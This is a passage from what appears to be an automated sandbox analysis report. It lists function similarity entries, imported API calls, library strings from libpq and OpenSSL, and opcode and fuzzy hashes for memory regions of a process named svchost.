                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdup
                                                                                            • String ID:
                                                                                            • API String ID: 1169197092-0
                                                                                            • Opcode ID: 8c52b0339befd6388461b0677d47348cfde48d33bbb91dc0ea7d181672b9b7d0
                                                                                            • Instruction ID: be27a8d6352e8c577fabfaa82304f6a27de6aa2a0d2e187a70814119d976373b
                                                                                            • Opcode Fuzzy Hash: 8c52b0339befd6388461b0677d47348cfde48d33bbb91dc0ea7d181672b9b7d0
                                                                                            • Instruction Fuzzy Hash: 71C1B232B0A7428AFB109F14E42027977A2FB45B84F6C2535DA4D677A6DF3EE509C708
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a706bcdd36c7d51db3d44c374c0ad4ce4307971269b878633400d05081ee730
                                                                                            • Instruction ID: f06384f9285f5b7e79687178b7fd98692edbe491189ca6bc9b542623afeff6e5
                                                                                            • Opcode Fuzzy Hash: 5a706bcdd36c7d51db3d44c374c0ad4ce4307971269b878633400d05081ee730
                                                                                            • Instruction Fuzzy Hash: 3F410356B5D1908BE722D7E8A86479EFE508B63388F805732DB2847381D6AFCCC5C302
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$R_set_error
                                                                                            • String ID: SSL_key_update$expect_quic$expect_quic_conn_only$ossl_quic_key_update$ssl\quic\quic_impl.c$ssl\ssl_lib.c
                                                                                            • API String ID: 3782669924-366322674
                                                                                            • Opcode ID: 25564e96d79a5e9f1770ff2002ba25e1bd2f4b674b2891871583d58af0c08a6a
                                                                                            • Instruction ID: 6492a20c1b9fb014e9ca57aa7e6373147bb45ea5e76b67ccdaa97f77777e1ba8
                                                                                            • Opcode Fuzzy Hash: 25564e96d79a5e9f1770ff2002ba25e1bd2f4b674b2891871583d58af0c08a6a
                                                                                            • Instruction Fuzzy Hash: 6281B331F1A64282F750DB15E5602BA67A2EF84784F4C2032EA4D63B9BDF3EE545C748
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: J
                                                                                            • API String ID: 0-1141589763
                                                                                            • Opcode ID: 0463199d8df6325186edb301e50d86457bf96c0d8572e77fa7021b894f976d1e
                                                                                            • Instruction ID: a3642c809f243b7e8ba70b20e08a28e4e552c514d35e4c63fde919a868b7f8ea
                                                                                            • Opcode Fuzzy Hash: 0463199d8df6325186edb301e50d86457bf96c0d8572e77fa7021b894f976d1e
                                                                                            • Instruction Fuzzy Hash: 58414753F5D2904AE7278BE8A86076DFE80875B79CF844636DE68077C4D26ACDC9C702
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEB68
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEB92
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEC09
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEC43
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,show password_encryption,0000000800282019,00007FFDA36E70D9,?,?,?,?,?,?,show password_encryption,00007FFDA36E4D17), ref: 00007FFDA36DEC88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strcmp$freemalloc
                                                                                            • String ID: %d.%d.%d$client_encoding$default_transaction_read_only$in_hot_standby$scram_iterations$server_version$show password_encryption$standard_conforming_strings
                                                                                            • API String ID: 2782048367-1971756575
                                                                                            • Opcode ID: bedd025669a3e4b1c374ede9de9ed8628e210072b9c61d520807a82ff4abf9de
                                                                                            • Instruction ID: 483c8de9890fdf1f37062ee4fa5df87c3c370ce90a7178d80540abf234552eac
                                                                                            • Opcode Fuzzy Hash: bedd025669a3e4b1c374ede9de9ed8628e210072b9c61d520807a82ff4abf9de
                                                                                            • Instruction Fuzzy Hash: EE91E763B0FB9286FB548F2595701BD3BA2EB117C4F086139DA5E573D6DE2EE5008708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputs$putc$__acrt_iob_func$fflushfreemalloc
                                                                                            • String ID: Query returned %d row%s.$out of memory
                                                                                            • API String ID: 3348181054-1070403740
                                                                                            • Opcode ID: daf36eade4ae832f9c3c1a95f1a9f5aa35b79da6bf250f0a2a24c6a83ae5a133
                                                                                            • Instruction ID: b7dba5235b247331061cd23039f345db9d6337d1676b2fb87ac8ec6a81e598fb
                                                                                            • Opcode Fuzzy Hash: daf36eade4ae832f9c3c1a95f1a9f5aa35b79da6bf250f0a2a24c6a83ae5a133
                                                                                            • Instruction Fuzzy Hash: 1E91F621B0B64646FA119F22A56037A67A3FF45BD0F5C6234DE5E63797CE3EE0098708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_strduplibintl_dgettextmemcpyselect
                                                                                            • String ID: %s() failed: %s$connection not open$invalid socket$libpq-16$select$show password_encryption$timeout expired
                                                                                            • API String ID: 162101712-2926306909
                                                                                            • Opcode ID: f93bd4caa0f8005bf9aa3bf496aafc810bb72b93c10e86d23885dcdda54c6d00
                                                                                            • Instruction ID: c3b615e10edf17d4e7dbb75ada5a27b7c6f0dfc270e33408942b620d37af60f7
                                                                                            • Opcode Fuzzy Hash: f93bd4caa0f8005bf9aa3bf496aafc810bb72b93c10e86d23885dcdda54c6d00
                                                                                            • Instruction Fuzzy Hash: CF61B531B1EA8285FA209F2494242F92752AF457A4F3C2335ED6D663D7DF7EE0498708
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36DA5C0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFDA36DA62B
                                                                                              • Part of subcall function 00007FFDA36DA5C0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFDA36DA750
                                                                                              • Part of subcall function 00007FFDA36DA5C0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFDA36DA762
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7D6A
                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7D8E
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7D9C
                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7DDB
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7E77
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36DA8D7,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D7E84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getenv$_strdup$freestrcmp
                                                                                            • String ID: PGREQUIRESSL$out of memory$require$sslmode$sslrootcert$system$user$verify-full
                                                                                            • API String ID: 1047289061-184802954
                                                                                            • Opcode ID: b7d1f05e20b50ada9acf8ed70c6fee453e34d7e5be8980550c3b692e8bcbb280
                                                                                            • Instruction ID: 154437e31937cc3127e8579f161dd12f29709c6a53e0b4efe7e339cb4fe45fd2
                                                                                            • Opcode Fuzzy Hash: b7d1f05e20b50ada9acf8ed70c6fee453e34d7e5be8980550c3b692e8bcbb280
                                                                                            • Instruction Fuzzy Hash: 5B515C22B0BE4280FE659F11E5702B867A2AF55BC4F4C6435CD4E23796DE3EE8458349
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EBCA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-00000001,00007FFDA36D14CE), ref: 00007FFDA36EBCAE
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D2BF4
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D2C78
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D2E2A
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D2E5D
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D2CCD
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_errnostrcmp$libintl_dgettextmalloc
                                                                                            • String ID: SCRAM-SHA-256$SCRAM-SHA-256-PLUS$channel binding is required, but server did not offer an authentication method that supports channel binding$channel binding required, but SSL not in use$duplicate SASL authentication request$fe_sendauth: invalid authentication request from server: invalid list of authentication mechanisms$fe_sendauth: no password supplied$none of the server's SASL authentication mechanisms are supported$out of memory$server offered SCRAM-SHA-256-PLUS authentication over a non-SSL connection
                                                                                            • API String ID: 349886974-2161727195
                                                                                            • Opcode ID: f04bf8b85d22d0ade34d147d98e5d56217356f588ba04273c084cd825d37f8ae
                                                                                            • Instruction ID: 3b16674bf9b47131db8cc3dd194d61770b8eeb917463d0656d54025f76e6cb22
                                                                                            • Opcode Fuzzy Hash: f04bf8b85d22d0ade34d147d98e5d56217356f588ba04273c084cd825d37f8ae
                                                                                            • Instruction Fuzzy Hash: B9816322B0EA4241FB919B15F4603B92363AF85BC4F5C6032DA4D66797DF6FE945C308
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 20842923dec6a37a38fbe7a44a2cfd6c13396a78ef2881cbdfb0ba667dcd84c0
                                                                                            • Instruction ID: 790235bbed15f1cbc3634ca775d828f42472d399f3e7b01ee864f7345b86de1b
                                                                                            • Opcode Fuzzy Hash: 20842923dec6a37a38fbe7a44a2cfd6c13396a78ef2881cbdfb0ba667dcd84c0
                                                                                            • Instruction Fuzzy Hash: D721C022A6E1558BD211DBF85C9039EFE80DF8332DB806B33E91D47780DBB8CD868611
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfree$strncmp$ErrorLastStartupmallocstrchr
                                                                                            • String ID: out of memory
                                                                                            • API String ID: 1775759426-2599737071
                                                                                            • Opcode ID: e7f72bd8354b383e440049ac08ae617397bfb18538584d10b4ae5da456b70258
                                                                                            • Instruction ID: 147dacbe091217827db96ab6890649fc90c87a50e52809b517cddbf6ea24d7fe
                                                                                            • Opcode Fuzzy Hash: e7f72bd8354b383e440049ac08ae617397bfb18538584d10b4ae5da456b70258
                                                                                            • Instruction Fuzzy Hash: 2B512D22B0BF4246FB559B15A5603796392AF45BC4F0C6070DE4D2AB9BDF3EE845C348
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA3601C50: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFDA3601C95
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA368238B
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA36823A3
                                                                                              • Part of subcall function 00007FFDA3677C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFDA3662254), ref: 00007FFDA3677C3F
                                                                                            • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA36823F4
                                                                                            • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA3682405
                                                                                            • i2d_X509_NAME.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA368241B
                                                                                            • i2d_X509_NAME.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA3682449
                                                                                            • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA3682457
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA368246C
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFDA366B727), ref: 00007FFDA3682484
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_sk_numR_newR_set_debugX509_i2d_$L_sk_valueO_zallocR_vset_error
                                                                                            • String ID: construct_ca_names$ssl\statem\statem_lib.c
                                                                                            • API String ID: 3967720115-3433467796
                                                                                            • Opcode ID: 65d90259314d5bc2c3ca5da892dfad4ecb74932502eb33e23e78017f74662cba
                                                                                            • Instruction ID: d091b442471d20a7f51407d6ecc8c8b2f54a0115de536dc2baf6206e83476340
                                                                                            • Opcode Fuzzy Hash: 65d90259314d5bc2c3ca5da892dfad4ecb74932502eb33e23e78017f74662cba
                                                                                            • Instruction Fuzzy Hash: BA41C521F0E24243F610E762E8715B95652AF997D0F4C2831DE4DA7B97EF7EE4818328
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36F4530: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000430,00000000,?,00000000,00000000,00000000,?,00000000,00007FFDA36F47BC,?,?,00000000), ref: 00007FFDA36F457B
                                                                                              • Part of subcall function 00007FFDA36F4530: CreateFileA.KERNEL32 ref: 00007FFDA36F4621
                                                                                              • Part of subcall function 00007FFDA36F4530: GetLastError.KERNEL32 ref: 00007FFDA36F4630
                                                                                              • Part of subcall function 00007FFDA36F4530: RtlGetLastNtStatus.NTDLL ref: 00007FFDA36F465B
                                                                                            • _read.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E16D5
                                                                                            • _read.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E17AB
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E17C6
                                                                                            • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E17DC
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E150F
                                                                                              • Part of subcall function 00007FFDA36F3E00: LoadLibraryExA.KERNEL32 ref: 00007FFDA36F3E47
                                                                                              • Part of subcall function 00007FFDA36F3E00: GetLastError.KERNEL32 ref: 00007FFDA36F3E5C
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E15D4
                                                                                            • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36E1823
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$Last_close$Error_read$CreateFileLibraryLoadStatus_wassertlibintl_dgettext
                                                                                            • String ID: argument of lo_write exceeds integer range$cannot determine OID of function %s$could not open file "%s": %s$could not read from file "%s": %s$lo_create
                                                                                            • API String ID: 1934334265-1567912773
                                                                                            • Opcode ID: 31785a9ec2ae0dbab07ace374526063e477f3dd8df08ff5f7233dc485cf677b8
                                                                                            • Instruction ID: 983fbb81375845c2952598041923d07fa0c8c10f058462d4137782ee44b9f99b
                                                                                            • Opcode Fuzzy Hash: 31785a9ec2ae0dbab07ace374526063e477f3dd8df08ff5f7233dc485cf677b8
                                                                                            • Instruction Fuzzy Hash: 0391B471B0A64286F7149F11E4643BA63A2FB44784F682135EB4D67787DF3EE448DB04
                                                                                            APIs
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D21F0
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD601
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD621
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD64A
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD660
                                                                                              • Part of subcall function 00007FFDA36DD590: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD689
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D227D
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D22D3
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
